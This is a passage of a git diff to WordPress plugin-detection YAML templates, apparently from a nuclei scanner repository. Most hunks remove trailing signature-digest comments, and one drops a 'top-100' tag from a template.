b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f4c43d5e8eb18338dfb3a5bad1d63c878513332fc7c4d127eb3e363ff493e1440221008918bb5aadc350199efef33c60e9bcca14cb225a91e06abc6f23deafa00158df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 290ab71df8..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205c2bb358be1596fcdc0150198852a4875240d67b28ac200e69e06214933b4ac20221009b4da49b7ebf1bf868b97b91d1226381f42272a6e595d4eb43e78b502770a9d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 6e683b87e6..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203eb046d4bac122edc23125477764212856a12e4aec68e1fbc77e320443fc9b62022100d8e8fb9fdb3a09d9b6d4075fb2a114e2d42a5dffcc665d843eeace90d871a71b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index b7a045951b..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022022a93718a53f3a3ac396f55c641669dcbe41c45c7d6c40097ca0b408548298bb022100c5e51d9d1f22d8e2421bc7a47f29522168bda819acbfa6d35478cd81a40bf0b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index d0fa559e88..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022001b20f49339cf9fe22cd4e1baead218d4276af9a3e00f2a3f2299e71a2c1b325022100b682fdc1b697852eba154b14866fb6b1fa63d112deb123f7fb7850ab42879703:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b182306f7e..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e56c1c05f6db1ed0418ef4287d109fef3cba879a50cca7646010950a70321da002210090b822ecd871b244a85010331dfd3e4c375e513ab5d04d220f1d561f80d0ad1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index c76755d890..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205a5ae429c3e6511264f13ebbedaf964e6e8b859aa8f6ecca9006735670ecd84c022100ce4f7438e7e09266ba15e558aab48862f75f9b5dcdc58de50fedd13dfa074a71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index eed33ee2ce..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204399661e9d91b64a617427e86035f551aff78bf021a2c52bea0ddc7ee2b286f60220120b29ba16721c7953354e86a6f78e6b1d7f25085bdcc33808e141276556ae5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index d7425aad98..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a919f726d4e9ce9842a4bab9b1e8731837b4c038ded72a6e783ddf25a55366bd02203122e75642aa4487174fd79ea96adb52614860ef165492a4294be552354d21fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e79d3e6a43..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 480a00453043022011be58b5608ed8306d377c6961b5d174f1cb03c517378c609863e28f1c9e3f91021f261fdfe1e6a3f2f75e009effcf8427f32c202fcbcead42d2bd15f4dccf8946:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index ad77bc8f6c..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206159cffed4970cc64e93458ec1699bff0c526301819c630ceda57c760f1892d0022100c3fc2af6d9f4ff30a6b34ebb0aef91947b94a404a3b5d6fa02aeaf07b25d7998:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 4da73daab3..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202172e34fccb39b0ee440f5c2653b6d399f1fff42ac46193b61d0968c7bf2b069022100c3bf075bf6eeb69497a8a6695f93a4794e4514a575faa79ec9466250894e90cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index f95467ab6a..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203d5d44f4ff4b74ed95cf3c54fc30d1e1c6f84d55875dfd7fb28d413caa242033022100d3b8faa2380ed76ec33062b59a6c9413281af526d286e9befe71af23102f8874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 3fc4e2caf2..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 480a00453043022021b342329da02116e11db543fd957e5a2e0a400776e9fca823532254602f6ad5021f11c85ffcc3d0cae5751ecaaef2cefcc8c855df26b67f055bf17ed70bb4176b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 213c144075..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bcf621ae5eb22ba0782cf87dba752660bb0b641d30a3189bdf4acb3910d988ba0220517544fd61e02d8e9ba5d62cb92a96a530be1878614e12fa5eaf65c1a6b88eb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 8584be8149..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100955f24949ae70523673909cf2d3a7eafb3953c5dc1e5201548859c361aff5d640221009951e4d11e324a15e4d9ed01f62d7d5e3cdc50196ae331cb5c97b2bafc2ac894:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index f7a9fd831a..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210092cc0fbc42afd081789bcd268bd3ab7f156ae5472ba288e905d11499d0ccd3cc0220589f826740b23a01ca87ca73bb8464ecff2dc0b8658be8dc70b4e0bc432279e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 66a705b988..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aac2fd0322dfbaa85f4404f9ae8e65fdb01d0a95c278d0ac02aac097a7f096f002202865d2a23dbefdb5331b56634ea2b89e5f02d11df8b498edbe0a3289ede725a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index ca10cb404e..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb7d24d5be658291ef8a333cab81ef2c257c9907275d1b70d58914267900be5c0220568f6e172760c842d0ba241a0fb9dcdddc77b9a66dde10a6139aad20f091c20a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 6cc6d4c942..e83e8d79e7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-200 http: - method: GET @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220547782293e71b224e40adca23c17c1dadc7ac0466aff1321814b16173936991102206f3f234ba0ec4288e49ca83bfe3837403c106a25e11bb821a1b5e4b09968d8d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index cb02bc5e3f..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220331d4e2002dfc93d1abe84da0eaeb11275e83e8590a560a64c6232ec669990ac02202d7734df37b87e0d1b7b1ad308ed0c0082ab552609d2fb675e53aab1c4e29dd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 5ab2312cd4..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f9e75415bb46b16ed20f118974140dd56ba11574d72e45894e17ea4a78fcf176022100e41568d665ea627c4e14946779c2498816a484f6fae909288d80523f65e11bf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index dfc9de67b1..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203eac0fcde4e714de5917052c018171eee4e506e0d90edbba3e0afdc282882283022100a9be4c4e98d1bee48ff0451f7e1d827a22f205010d006fbea8d9ca65c19ef078:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 6b2682e7d0..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e5b0d6b115127daebc1dd00fea531a41e0823be832c7fc8e32a25c15cf028ab702207c6501db73db2d3dbccef9bf9bb27ff5267c61e99db49cbe334b24c787ea2bb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index d508d803ce..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200b320f67619f0d42b3b98f4b1cffff6ce72abb1a1ae1bac514fe78d71948d4ea02200464d090ca2e194772f46e86c65c6a60e91d2ea9435cc10324b7dd455c38a855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 36ec75ea89..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ae1c1be95dfad1e14955c7207ce06ce266b8b45e15f13e83c90cf31e1185bb1702207759c1d58c4d74760bd343f130355afaa007e1f7692f696b6148c7eb6e769ddb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index a547c6d5e0..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022013a9316ed662a3186a8a9fcb4952b333247d06866790df9e41b02fb168e4860c02201c676990c5b60a8df22a706c16309a3fda7ce32e6e67aeeca1d0ca909a6f19f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 43b57a314d..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206acfe23c37fa2142f789e6974c8c7107a773dc62a552e149c6336db0f97ba1f902204c73ee3c89c74675c955adbb329ade400ef4bc3017d31cc64bc1e54aa0604219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 27b9f672ce..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210087be68015b00440fbc282de11607244b3b55928e82cb814e85284f441d7772560221008feace7ed5bfa3818834f107af1908cc4816347ca1d169c7a77b4d5f7c2b40cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index b58585e8bb..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cc95b5d76c817abbf83b41a3873d969d1d852402ba02e1a23d4a6e742216d8dc022025382aed1b8e6269996b2ae4f4a5b663030e861af86674ded0985445c38c66eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index fa0e2c3fd9..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009692ab26a68458f02dceefcce4d4925423670d06bea11bd0584376b69829f4c70220194e4219dccc3bb335ec61b6dd166038dec4f9bfc77c9569124cff7e60d253a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index a633ef9e0a..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220194731e67a351cbbae0154fdce9eabb2df0085d373027c644fa52b7a34ec42c902206163846ea7651bde7266a009fd7570f08ef0b4e09a3525b58c65e8d47b9531f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index a84b7643a9..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bae80353f0fb5eb68f10c6f37538f06b1859f0ce00ccc5831c91840d2077698a0221009b540bd242affd6b6181fabc955405b319ee638f6bce33ad845309cb5a97c8f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 4515dbe77c..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008a69cdc99578f17ca531c68e29820406c67d116af4b82e7d4cf0f4937502eeb7022100fbcf056290b3f5cef6f0fcd71907ebae25d1b1f8405246c42ecb23d1ba1edb1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index a15f4c8a5c..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202b106bcc0a706084c042dc80bdff6f9a98c4ee8d1b72e45cc8eb873431f5e7eb0220717f9e0a9e1a5b85eca8f61dfe56263e24990f07cc95b6678bb11ce14842336b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 02936dde28..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c5dbc8c4961406720186b89c5822c5f7ef0899639d77f77fa7dc6549e881ca8902201b049f51deab51f4316b4b7cc6470bc7d42ae44b82cea3e6b903b747756454f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcf46c8f1e..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022010d8aa19289ca9c78b514e55c486d87e0d345fb2cd419949153d5938404322e002210086459a9f8f2d2c78770762195a0c18ef75440034285fbf088ecc772eb171243c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 1303a274e6..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022016c84883b1e7c6fca2e7b844fcf7b06d5f6d723e1bbc057fc2a07d25e3dfd5c702204de464c9f6abb7da1615df6ce51b1302bd1e13cb1ff0228001cdfa4a67e72d44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index eb9c5b84b7..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204c857a0d344120f7153cdf32d3994d166ddfb3d0617bcb86dd8a2b0388d8705c0221008be2c740ac664f15c7d0a785c57029ad8faa1d8a8a6db037e98f33a9dfbde518:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f12e075f4e..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d5adf07949ce503f7f61bde9880de60a0bcadae990570e4fbb45f22e029f8fef022008d977895a1a4bc59b6a8d5d9b8057fa8bc59ad4c599ec39ceace7a5f69df71c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 0383e6d58b..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022001ca0b24ff29c9fde336940b863aa33f860288cace40ff711e2029562c0da93d0220594ea656a44fdec2d2028e5fcf294601af741765f64867748589d0c9afa56605:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 72b186d6fd..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207e37859619509f365e5ccf09524902dcf94c53c54bc6c2569c38eeaa9a0d8c37022100f3051f9ad67daa2b75df6c69cb75d19a5c97bbb51aa79426ea2fc68024667610:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index b18b788450..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202ef87572725cb107854522b3c6e0bb09f882ed2aaa1d533999a3600a7e6af85c0220630efdbdf9dde27e7de28d6313114fbf6cbd962fd15bce3c5e87727d85cc7cbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 1b8b67ccee..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022026e18ef7f58e80e76e0adb8501de473350ac8b0973abe5282a87bcec7c85b16002207396d287c9964635d5f358a0355a7b9ab7a6426842e76a4970eb5dbedfc59e0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 501ae3437f..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200f12b8501d39ac1ebd6cdb6734b7546e96e09c163633842debb6cecfe974029402201997c1ad4e64c9b682aff6c042b3243cc5ed2bce823857e0dfe8c0111b687033:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index a8c552ec42..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210082e6a3e66ec9fd5a8696bbc18e7542ea345e757e09280d9733eac640707634450221008909fe2fcb50936e038c21fa55108e797ee44e6a4b3b7f29ff069993d5819cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 4ce1c70e71..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 